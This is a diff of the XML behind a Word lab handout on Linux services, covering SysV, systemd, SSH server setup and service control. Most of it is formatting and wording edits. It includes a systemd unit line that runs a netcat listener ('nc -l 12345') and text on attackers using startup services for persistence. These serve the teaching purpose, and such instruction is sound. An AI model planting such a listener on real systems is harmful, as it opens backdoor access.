         <w:br/>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ExecStart=/bin/nc -l 12345</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ExecStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>=/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -l 12345</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -1743,8 +2632,30 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>netstat -na --tcp</w:t>
-      </w:r>
+        <w:t>netstat -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>na</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.  (Or you can connect to it from your host or another VM with netcat.)</w:t>
       </w:r>
@@ -1760,7 +2671,7 @@
 </file>
 
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
-<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex wp14">
+<w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="13611D58"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
@@ -1949,7 +2860,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>

--- a/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
+++ b/3.Linux/05.Apps and Services/Linux Lab 5 Apps and Services.docx
@@ -72,15 +72,30 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">These slide decks attempt to give you a feeling of where the SysV and systemd come from and the basics of how they work.  There may be more detail than you really want.  The most important things are the day to day </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>uses:</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">  starting, stopping, and restarting services, so concentrate on those items.  </w:t>
+        <w:t xml:space="preserve">These slide decks attempt to give you a feeling of where the SysV and systemd come from and the basics of how they work.  There may be more detail than you really want.  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The most important things are the day to day uses:  </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>starting, stopping, and restarting services</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>, so concentrate on those items</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">.  </w:t>
       </w:r>
       <w:r>
         <w:t>Please execute the commands as you see them in this lesson to gain practice.</w:t>
@@ -101,15 +116,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Most Linux distros have replaced SysV with systemd; Ubuntu 15 and up, CentOS 7 and up, and Fedora 14 and up.  However, systemd retains backward compatibility with SysV.  We still need to know the basics of SysV since attackers can use SysV to enable backdoor services that automatically start at </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>reboot</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> so they don’t lose their hold on the computer.  </w:t>
+        <w:t xml:space="preserve">Most Linux distros have replaced SysV with systemd; Ubuntu 15 and up, CentOS 7 and up, and Fedora 14 and up.  However, systemd retains backward compatibility with SysV.  We still need to know the basics of SysV since attackers can use SysV to enable backdoor services that automatically start at reboot so they don’t lose their hold on the computer.  </w:t>
       </w:r>
       <w:r>
         <w:t>(The security term for this is persistence.)</w:t>
@@ -117,7 +124,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>This lab was tested on Ubuntu 18.04 LTS.  It should work well with most Linux versions that run systemd.</w:t>
+        <w:t>This lab was tested on Ubuntu 18.04</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> and 20.04</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> LTS.  It should work well with most Linux versions that run systemd.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -125,6 +138,50 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
+        <w:t>Important Points</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>systemd (system d) is the current method of controlling Linux services.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>SysV (system five) is obsolete but is still supported by most implementations of systemd.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="3"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Students should know how to find service status, stop, start, and restart services using systemd and SysV</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+      </w:pPr>
+      <w:r>
         <w:t>Practice with SSH server on your VM</w:t>
       </w:r>
     </w:p>
@@ -145,7 +202,7 @@
         <w:t xml:space="preserve">We </w:t>
       </w:r>
       <w:r>
-        <w:t>might</w:t>
+        <w:t>will</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> use</w:t>
@@ -175,25 +232,17 @@
         <w:t xml:space="preserve"> (or agent)</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> is used to connect to a server.  The SSH client is installed on our Ubuntu 18 desktop, but the server is not.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">If you were to Google “install ssh server on ubuntu desktop” you would find that the common SSH installation is called </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>openssh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">-server.  You can find it in the Ubuntu Software Center GUI, </w:t>
+        <w:t xml:space="preserve"> is used to connect to a server.  The SSH client is installed on our Ubuntu desktop, but the server is not.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">If you were to Google “install ssh server on ubuntu desktop” you would find that the common SSH installation is called openssh-server.  You can find it in the Ubuntu Software Center GUI, </w:t>
       </w:r>
       <w:r>
         <w:t>or</w:t>
@@ -208,21 +257,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t xml:space="preserve">sudo apt-get install </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>openssh</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>-server</w:t>
+        <w:t>sudo apt install openssh-server</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -232,10 +267,10 @@
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50340B27" wp14:editId="5211E507">
-            <wp:extent cx="4640239" cy="2144949"/>
-            <wp:effectExtent l="0" t="0" r="8255" b="8255"/>
-            <wp:docPr id="1" name="Picture 1"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F802040" wp14:editId="7A1A14C2">
+            <wp:extent cx="5219700" cy="2400727"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -243,7 +278,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
+                    <pic:cNvPr id="1" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -255,7 +290,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4672903" cy="2160048"/>
+                      <a:ext cx="5232258" cy="2406503"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -276,44 +311,8 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>usr</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>sbin</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>sshd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>/usr/sbin/sshd</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
@@ -321,15 +320,7 @@
         <w:t>for SSH Daemon.  The service</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> name is ssh in Ubuntu; in RedHat variants it is called </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sshd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.  Go figure.</w:t>
+        <w:t xml:space="preserve"> name is ssh in Ubuntu; in RedHat variants it is called sshd.  Go figure.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -428,15 +419,7 @@
         <w:t xml:space="preserve"> command </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">to stop, start, and restart the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sshd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> service.  Each time you change the service, use</w:t>
+        <w:t>to stop, start, and restart the sshd service.  Each time you change the service, use</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -463,21 +446,7 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t xml:space="preserve">When you are done, make sure the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>sshd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> service is stopped.</w:t>
+        <w:t>When you are done, make sure the sshd service is stopped.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -488,26 +457,43 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t>ls /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>rc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>ls /etc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:r>
+        <w:t>or</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ls /etc/rc*</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -d </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+        </w:rPr>
+        <w:t>to see just directories that start with rc</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> on your Ubuntu VM, you should be able to find the rc </w:t>
       </w:r>
       <w:r>
         <w:t>directories</w:t>
@@ -525,27 +511,22 @@
         <w:t xml:space="preserve"> is 5,</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> so let’s look at it with </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ls -l /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>/rc</w:t>
+        <w:t xml:space="preserve"> so let’s look at </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>rc5.d</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ls -l /etc/rc</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -616,131 +597,34 @@
         <w:t>The symbolic links</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> in /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/rc</w:t>
+        <w:t xml:space="preserve"> (symlinks)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> in /etc/rc</w:t>
       </w:r>
       <w:r>
         <w:t>5</w:t>
       </w:r>
       <w:r>
-        <w:t>.d point to files in the /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>init</w:t>
+        <w:t>.d point to files in the /etc/init and /etc/init</w:t>
       </w:r>
       <w:r>
         <w:t>.</w:t>
       </w:r>
       <w:r>
-        <w:t>d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> directories.  Look at the contents of those directories as well.</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>init.d</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>directori</w:t>
-      </w:r>
-      <w:r>
-        <w:t>y</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>d directories.  Look at the contents of those directories as well.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">  If you look at the contents of one of the files in the /etc/init.d </w:t>
+      </w:r>
+      <w:r>
+        <w:t>directory</w:t>
+      </w:r>
       <w:r>
         <w:t>, you will see it contains a shell script.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  Remember, in SysV the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> program looks at the files in the proper run level directory and then executes the files the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> point to.  It uses </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>symlinks</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
+        <w:t xml:space="preserve">  Remember, in SysV the init program looks at the files in the proper run level directory and then executes the files the symlinks point to.  It uses symlinks to avoid duplicate copies of a file that is executed by multiple run levels</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -796,211 +680,77 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">Note:  In other distros like CentOS, there is no init directory, since init is the name of the command used to change </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>run level</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> directory, since </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">s.  Also, the files are kept in (say for </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>init</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>run level</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve"> is the name of the command used to change </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> 5) </w:t>
+      </w:r>
